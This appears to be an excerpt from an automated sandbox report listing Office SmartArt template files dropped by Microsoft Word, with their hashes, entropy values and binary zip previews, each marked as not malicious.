                                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6024
                                                                                                                                              Entropy (8bit):7.886254023824049
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                              MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                              SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                              SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                              SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):9191
                                                                                                                                              Entropy (8bit):7.93263830735235
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                              MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                              SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                              SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                              SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4326
                                                                                                                                              Entropy (8bit):7.821066198539098
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                              MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                              SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                              SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                              SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):7370
                                                                                                                                              Entropy (8bit):7.9204386289679745
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                              MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                              SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                              SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                              SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5596
                                                                                                                                              Entropy (8bit):7.875182123405584
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                              MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                              SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                              SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                              SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3683
                                                                                                                                              Entropy (8bit):7.772039166640107
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                              MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                              SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                              SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                              SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4888
                                                                                                                                              Entropy (8bit):7.8636569313247335
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                              MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                              SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                              SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                              SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6448
                                                                                                                                              Entropy (8bit):7.897260397307811
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                              MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                              SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                              SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                              SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5630
                                                                                                                                              Entropy (8bit):7.87271654296772
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                              MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                              SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                              SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                              SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6193
                                                                                                                                              Entropy (8bit):7.855499268199703
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                              MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                              SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                              SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                              SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3075
                                                                                                                                              Entropy (8bit):7.716021191059687
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                              MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                              SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                              SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                              SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5151
                                                                                                                                              Entropy (8bit):7.859615916913808
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                              MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                              SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                              SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                              SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                              Malicious:false
